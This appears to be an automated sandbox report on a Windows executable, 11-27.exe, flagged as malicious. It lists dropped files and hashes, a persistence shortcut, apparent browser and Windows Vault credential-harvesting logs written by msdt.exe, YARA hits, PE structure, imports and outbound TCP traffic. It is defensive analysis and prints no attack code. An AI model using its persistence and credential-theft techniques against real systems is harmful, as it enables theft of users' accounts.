SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\tpmH.url Download File
Process:	C:\Users\user\Desktop\11-27.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Hmptdrv.exe>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	172
Entropy (8bit):	5.125086411656618
Encrypted:	false
SSDEEP:	3:HRAbABGQYmHmEX+eLCMuL4EkD5oef5yaKcGdNvQJ5ontCBuXV9k/qIH19Yxv:HRYFVmceLPqJkDlR94dNvQJ5OtZF9k/4
MD5:	BCF31FFF2A1B5C83536F77B07774DA71
SHA1:	2A39455E4C88A5E846D02CDBF552CE1443D89861
SHA-256:	D8816D5504659F8B83B983071F2EE2B10F6475A69393DDBCA863BE651BABC7E6
SHA-512:	701A23F7C68FDD2F7B503B2ABE029FD1B7047ADC2A2AFE33C8DAA4C955E60E0D8159354F9E2E1CD3DD827D5D92D64FA1A0B098F22C94F60CC7BD4124FCDD19FF
Malicious:	false
Yara Hits:	Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\tpmH.url, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\tpmH.url, Author: @itsreallynick (Nick Carr) Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\tpmH.url, Author: @itsreallynick (Nick Carr)
Preview:	[InternetShortcut]..URL=file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Hmptdrv.exe..IconIndex=1..IconFile=.url..Modified=20F06BA06D07BD014D..HotKey=1601..

C:\Users\user\AppData\Roaming\7N4802EQ\7N4logim.jpeg Download File
Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	84744
Entropy (8bit):	7.898586173659106
Encrypted:	false
SSDEEP:	1536:CxsQlrGwXnwZNL7/wCPrBmnE38W0mA/dj67C9OUz+F0jpubFox:NirGMwjL7/frmmIdWGtz10bm
MD5:	4C58EDC25E731504D6F806F1A8778C6B
SHA1:	132E89B1FE713E42A3E83511A9AA7F42E3C7290C
SHA-256:	3B8DB97E3AF28C9836BED489FC8C22CBB38AD1A94D55FB63EE5DD0B043D9265A
SHA-512:	E0CD482042BE3DE95545117BAE49537D1D37AE452A8E65F259F0BBFEAA7835FEF956102DF281F5A74A8D6437F11A8A1CE67248B784ED814D5661878617450849
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.\|..).?.H.'.\|....).?m.....h.t......\|4.%...d....

C:\Users\user\AppData\Roaming\7N4802EQ\7N4logrg.ini Download File
Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	2.7883088224543333
Encrypted:	false
SSDEEP:	3:rFGQJhIl:RGQPY
MD5:	4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1:	1E332822167C6F351B99615EADA2C30A538FF037
SHA-256:	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512:	EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious:	false
Preview:	....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\7N4802EQ\7N4logri.ini Download File
Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
SSDEEP:	3:+slXllAGQJhIl:dlIGQPY
MD5:	D63A82E5D81E02E399090AF26DB0B9CB
SHA1:	91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:	38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:	true
Preview:	....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\7N4802EQ\7N4logrv.ini Download File
Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	data
Category:	dropped
Size (bytes):	210
Entropy (8bit):	3.457585662331708
Encrypted:	false
SSDEEP:	6:tGQPYlIaExGNlGcQga3Of9y96GO4uczWs1EoY:MlIaExGNYvOI6x4XWszY
MD5:	494F210225AA08FC68B443BE927DEE67
SHA1:	1808AAD6DBE7CDDFCF7B1407911AAE84BE6B0AF2
SHA-256:	154A6EFDF5C68EC0E913317DE33D38B847A40F2963831A93D443864CB9611731
SHA-512:	3E029776E480515FA8AC79955A3D1DB169DE9119A260044D9FC6B00606F3D0DFD26CA5BF5D13387D4D590074319873B22559BE92E83B94564665BE2713F6BBDD
Malicious:	true
Preview:	...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.u.t.e.m.x.q.r.r.y.e.k.u.q.l.....A.u.t.:.......P.a.s.s.:.......

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.190919068104972
TrID:	Win32 Executable (generic) a (10002005/4) 99.24% InstallShield setup (43055/19) 0.43% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	11-27.exe
File size:	1311424
MD5:	4312f55eb22b6cd52d0f6f93f40215af
SHA1:	a0439365d1f3e47d03729760aaaafd5f10991d53
SHA256:	4b5650a097c6a9ee7bc32fb5aa691ce1d1f358bcbdcbccfc6ba66d2f76f612af
SHA512:	ddd89cb36d43f9a3977265409e60cf18a144f7c3e90b894a608312623ecc631f70d5a322eda53169da8b724ab273188ed3a4c5a3c5739ff4d6bffc4db1c0df2f
SSDEEP:	24576:FiLDfJXRq+fowpGG7By3Z72mwZ8gKmX9hIbEIKn:FiLr5By3Z7N/gKAj
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	b2a8949ea686da6a

Static PE Info

General
Entrypoint:	0x47d118
Entrypoint Section:	CODE
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c7f986b767e22dea5696886cb4d7da70

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	8/18/2016 1:17:17 PM 11/2/2017 1:17:17 PM
Subject Chain	CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	3B66EDDAB891B79FEDB150AC2C59DB3A
Thumbprint SHA-1:	98ED99A67886D020C564923B7DF25E9AC019DF26
Thumbprint SHA-256:	57DD481BF26C0A55C3E867B2D6C6978BEAF5CE3509325CA2607D853F9349A9FF
Serial:	330000014096A9EE7056FECC07000100000140

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0047CE60h
call 00007EFC1CC8BE85h
lea edx, dword ptr [ebx+eax]
push 00000019h
mov eax, dword ptr [004807A4h]
mov eax, dword ptr [eax]
call 00007EFC1CCE0FD8h
mov ecx, dword ptr [00480750h]
mov eax, dword ptr [004807A4h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0047C9ECh]
call 00007EFC1CCE0FD8h
mov eax, dword ptr [00480750h]
mov eax, dword ptr [eax]
xor edx, edx
call 00007EFC1CCDA54Ah
mov eax, dword ptr [004807A4h]
mov eax, dword ptr [eax]
mov byte ptr [eax+5Bh], 00000000h
mov eax, dword ptr [004807A4h]
mov eax, dword ptr [eax]
call 00007EFC1CCE1033h
call 00007EFC1CC89976h
nop
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x83000	0x22b0	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x91000	0xb1400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x13ae00	0x54c0	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x88000	0x8138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x87000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x7c17c	0x7c200	False	0.522454053374	data	6.55138199518	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA	0x7e000	0x2954	0x2a00	False	0.412109375	data	4.92006813937	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS	0x81000	0x114d	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x83000	0x22b0	0x2400	False	0.355251736111	data	4.85312153514	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x86000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x87000	0x18	0x200	False	0.05078125	data	0.206920017787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x88000	0x8138	0x8200	False	0.584435096154	data	6.65713214053	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x91000	0xb1400	0xb1400	False	0.549848763664	data	7.13692340937	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x9217c	0x134	data
RT_CURSOR	0x922b0	0x134	data
RT_CURSOR	0x923e4	0x134	data
RT_CURSOR	0x92518	0x134	data
RT_CURSOR	0x9264c	0x134	data
RT_CURSOR	0x92780	0x134	data
RT_CURSOR	0x928b4	0x134	data
RT_BITMAP	0x929e8	0x1d0	data
RT_BITMAP	0x92bb8	0x1e4	data
RT_BITMAP	0x92d9c	0x1d0	data
RT_BITMAP	0x92f6c	0x1d0	data
RT_BITMAP	0x9313c	0x1d0	data
RT_BITMAP	0x9330c	0x1d0	data
RT_BITMAP	0x934dc	0x1d0	data
RT_BITMAP	0x936ac	0x1d0	data
RT_BITMAP	0x9387c	0x1d0	data
RT_BITMAP	0x93a4c	0x1d0	data
RT_BITMAP	0x93c1c	0x5c	data
RT_BITMAP	0x93c78	0x5c	data
RT_BITMAP	0x93cd4	0x5c	data
RT_BITMAP	0x93d30	0x5c	data
RT_BITMAP	0x93d8c	0x5c	data
RT_BITMAP	0x93de8	0x138	data
RT_BITMAP	0x93f20	0x138	data
RT_BITMAP	0x94058	0x138	data
RT_BITMAP	0x94190	0x138	data
RT_BITMAP	0x942c8	0x138	data
RT_BITMAP	0x94400	0x138	data
RT_BITMAP	0x94538	0x104	data
RT_BITMAP	0x9463c	0x138	data
RT_BITMAP	0x94774	0x104	data
RT_BITMAP	0x94878	0x138	data
RT_BITMAP	0x949b0	0xe8	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x94a98	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x94f00	0x988	data	English	United States
RT_ICON	0x95888	0x10a8	data	English	United States
RT_ICON	0x96930	0x25a8	data	English	United States
RT_ICON	0x98ed8	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 240, next used block 251658240	English	United States
RT_ICON	0x9d100	0x5488	data	English	United States
RT_ICON	0xa2588	0x94a8	data	English	United States
RT_ICON	0xaba30	0xa2a8	data	English	United States
RT_DIALOG	0xb5cd8	0x52	data
RT_STRING	0xb5d2c	0x280	data
RT_STRING	0xb5fac	0x274	data
RT_STRING	0xb6220	0x1ec	data
RT_STRING	0xb640c	0x13c	data
RT_STRING	0xb6548	0x2c8	data
RT_STRING	0xb6810	0xfc	Hitachi SH big-endian COFF object file, not stripped, 17664 sections, symbol offset=0x65007200, 83907328 symbols, optional header size 28672
RT_STRING	0xb690c	0xf8	data
RT_STRING	0xb6a04	0x128	data
RT_STRING	0xb6b2c	0x468	data
RT_STRING	0xb6f94	0x37c	data
RT_STRING	0xb7310	0x39c	data
RT_STRING	0xb76ac	0x3e8	data
RT_STRING	0xb7a94	0xf4	data
RT_STRING	0xb7b88	0xc4	data
RT_STRING	0xb7c4c	0x2c0	data
RT_STRING	0xb7f0c	0x478	data
RT_STRING	0xb8384	0x3ac	data
RT_STRING	0xb8730	0x2d4	data
RT_RCDATA	0xb8a04	0x10	data
RT_RCDATA	0xb8a14	0x398	data
RT_RCDATA	0xb8dac	0x494	Delphi compiled form 'TLoginDialog'
RT_RCDATA	0xb9240	0x3c4	Delphi compiled form 'TPasswordDialog'
RT_RCDATA	0xb9604	0x76f67	GIF image data, version 89a, 577 x 188	English	United States
RT_RCDATA	0x13056c	0x11a42	Delphi compiled form 'T__958758541'
RT_GROUP_CURSOR	0x141fb0	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x141fc4	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x141fd8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x141fec	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x142000	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x142014	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x142028	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON	0x14203c	0x76	data	English	United States
RT_MANIFEST	0x1420b4	0x2f0	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetROP2, GetPolyFillMode, GetPixel, GetPaletteEntries, GetObjectA, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CoUninitialize, CoInitialize
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2020 10:24:54.462758064 CET	49727	443	192.168.2.6	162.159.136.232
Nov 28, 2020 10:24:54.479079962 CET	443	49727	162.159.136.232	192.168.2.6
Nov 28, 2020 10:24:54.479221106 CET	49727	443	192.168.2.6	162.159.136.232
Nov 28, 2020 10:24:54.479892015 CET	49727	443	192.168.2.6	162.159.136.232
Nov 28, 2020 10:24:54.496345997 CET	443	49727	162.159.136.232	192.168.2.6
Nov 28, 2020 10:24:54.496419907 CET	49727	443	192.168.2.6	162.159.136.232
Nov 28, 2020 10:24:54.564887047 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.581216097 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.581317902 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.588512897 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.604788065 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.606697083 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.606717110 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.606730938 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.606816053 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.646579027 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.667033911 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.683271885 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.683537006 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.724673033 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.761245012 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.777658939 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.814883947 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.814919949 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.814944029 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.814964056 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.814990044 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.814990997 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.815007925 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815033913 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815054893 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815068960 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815072060 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.815090895 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815104008 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815123081 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815140009 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.815149069 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815170050 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815177917 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.815196991 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815227985 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.815229893 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815249920 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815274000 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815278053 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.815300941 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.815321922 CET	443	49728	162.159.129.233	192.168.2.6
